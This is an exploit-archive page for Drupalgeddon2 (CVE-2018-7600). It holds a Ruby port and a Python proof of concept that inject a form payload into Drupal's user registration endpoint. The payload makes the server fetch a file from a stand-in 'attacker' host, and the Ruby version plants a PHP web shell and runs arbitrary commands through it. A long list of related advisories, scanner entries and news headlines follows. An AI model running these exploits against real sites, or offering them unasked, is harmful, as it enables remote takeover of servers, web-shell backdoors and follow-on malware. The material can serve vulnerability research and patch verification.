Lucene search
Hans Topo1337DAY-ID-30171HistoryApr 13, 2018 - 12:00 a.m.
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit
2018-04-1300:00:00
Hans Topo
0day.today
97
0.976 High
EPSS
Percentile
100.0%
Exploit for php platform in category web applications
require 'net/http'
# Hans Topo ruby port from Drupalggedon2 exploit.
# Based on Vitalii Rudnykh exploit
target = ARGV[0]
command = ARGV[1]
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
shell = "<?php system($_GET['cmd']); ?>"
payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
uri = URI(url)
http = Net::HTTP.new(uri.host,uri.port)
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
req = Net::HTTP::Post.new(uri.path)
req.body = payload
response = http.request(req)
if response.code != "200"
puts "[*] Response: " + response.code
puts "[*] Target seems not to be exploitable"
exit
end
puts "[*] Target seems to be exploitable."
exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body
----------------------Exploit PoC 2---------------------------
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = raw_input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
# 0day.today [2018-04-14] #Related
checkpoint_advisories
checkpoint_advisories
Drupal Core Remote Code Execution (CVE-2018-7600)
2018-03-29 00:00:00
Drupal Core Form Rendering Remote Code Execution (CVE-2018-7600)
2020-11-05 00:00:00
dsquare
dsquare
Drupal 8 SA-CORE-2018-002 RCE
2018-05-08 00:00:00
Drupal 7 SA-CORE-2018-002 RCE
2018-05-08 00:00:00
osv
osv
drupal7 - security update
2018-03-29 00:00:00
drupal7 - security update
2018-03-28 00:00:00
CVE-2018-7600
2018-03-29 07:29:00
nessus
nessus
Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)
2018-03-28 00:00:00
Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)
2018-03-29 00:00:00
Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)
2018-04-13 00:00:00
threatpost
threatpost
New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors
2018-10-11 20:24:54
Cryptojacking Attack Targets Make-A-Wish Foundation Website
2018-11-19 16:20:59
Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0
2018-05-03 16:57:19
ibm
ibm
saint
saint
Drupal Form API command execution
2018-04-25 00:00:00
Drupal Form API command execution
2018-04-25 00:00:00
Drupal Form API command execution
2018-04-25 00:00:00
cisa_kev
cisa_kev
Drupal Core Remote Code Execution Vulnerability
2021-11-03 00:00:00
exploitpack
exploitpack
Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)
2018-04-13 00:00:00
Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)
2018-04-17 00:00:00
Drupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution
2018-04-13 00:00:00
openvas
openvas
impervablog
impervablog
Drupalgeddon 2.0: Are Hackers Slacking Off?
2018-04-13 19:13:25
How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications
2019-02-13 12:52:46
The State of Web Application Vulnerabilities in 2018
2019-01-09 14:00:26
debiancve
debiancve
CVE-2018-7600
2018-03-29 07:29:00
zdt
zdt
Drupal Drupalgeddon 2 Forms API Property Injection Exploit
2018-04-26 00:00:00
metasploit
metasploit
Drupal Drupalgeddon 2 Forms API Property Injection
2018-04-18 00:05:45
prion
prion
Code injection
2018-03-29 07:29:00
debian
debian
[SECURITY] [DSA 4156-1] drupal7 security update
2018-03-28 22:31:37
[SECURITY] [DSA 4156-1] drupal7 security update
2018-03-28 22:31:37
[SECURITY] [DLA 1325-1] drupal7 security update
2018-03-28 22:42:25
veracode
veracode
Remote Code Execution (RCE)
2018-04-03 05:03:22
Remote Code Execution (RCE)
2018-04-26 10:18:46
packetstorm
packetstorm
Drupal Drupalgeddon2 Remote Code Execution Ruby Port
2018-04-13 00:00:00
Drupalgeddon2 Drupal Remote Code Execution
2018-04-17 00:00:00
Drupal Drupalgeddon2 Remote Code Execution
2018-04-13 00:00:00
cve
cve
CVE-2018-7600
2018-03-29 07:29:00
thn
thn
Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit
2018-06-05 08:06:00
Hackers Have Started Exploiting Drupal RCE Exploit Released Yesterday
2018-04-14 08:29:00
Third Critical Drupal Flaw Discovered—Patch Your Sites Immediately
2018-04-25 16:41:00
qualysblog
qualysblog
Staying Safe in the Era of Browser-based Cryptocurrency Mining
2018-07-25 17:00:02
Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776
2018-08-23 20:27:19
Microsoft Misfires with Meltdown Patch, while WannaCry Pops Up at Boeing
2018-04-02 18:02:51
alpinelinux
alpinelinux
CVE-2018-7600
2018-03-29 07:29:00
freebsd
freebsd
drupal -- Drupal Core - Multiple Vulnerabilities
2018-03-13 00:00:00
f5
f5
K22854260 : Drupal vulnerability CVE-2018-7600
2018-03-29 00:00:00
hackerone
hackerone
wallarmlab
wallarmlab
Drupalgeddon Two.
2018-04-20 19:31:22
ubuntucve
ubuntucve
CVE-2018-7600
2018-03-29 00:00:00
nuclei
nuclei
Drupal - Remote Code Execution
2021-02-15 13:33:33
archlinux
archlinux
[ASA-201804-1] drupal: arbitrary code execution
2018-04-01 00:00:00
attackerkb
attackerkb
Drupalgeddon 2
2018-03-29 00:00:00
seebug
seebug
Drupal core Remote Code Execution(CVE-2018-7600)
(Drupalgeddon2)
2018-03-30 00:00:00
exploitdb
exploitdb
githubexploit
githubexploit
Exploit for Improper Input Validation in Drupal
2020-08-31 22:55:18
malwarebytes
malwarebytes
A look into Drupalgeddon’s client-side attacks
2018-05-18 15:00:00
hivepro
hivepro
Muhstik botnet adds another vulnerability exploit to its arsenal
2022-03-29 12:17:03
avleonov
avleonov
Vulnerability Databases: Classification and Registry
2018-06-05 15:57:41
ubuntu
ubuntu
Drupal vulnerabilities
2021-03-15 00:00:00
securelist
securelist
Incident Response Analyst Report 2019
2020-08-06 10:00:34
kitploit
kitploit
Darksplitz - Exploit Framework
2019-04-04 21:12:00
Sn1per v5.0 - Automated Pentest Recon Scanner
2018-07-05 13:45:00
Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts
2018-11-24 12:43:00
talosblog
talosblog
DNS Hijacking Abuses Trust In Core Internet Service
2019-04-18 16:08:25
fedora
fedora
[SECURITY] Fedora 27 Update: drupal7-7.59-1.fc27
2018-05-10 19:16:35
[SECURITY] Fedora 28 Update: drupal8-8.6.10-1.fc28
2019-03-07 20:06:44
[SECURITY] Fedora 28 Update: drupal8-8.4.8-1.fc28
2018-05-09 21:27:49
ics
ics
Top 10 Routinely Exploited Vulnerabilities
2020-05-12 12:00:00
Top Routinely Exploited Vulnerabilities
2021-08-20 12:00:00
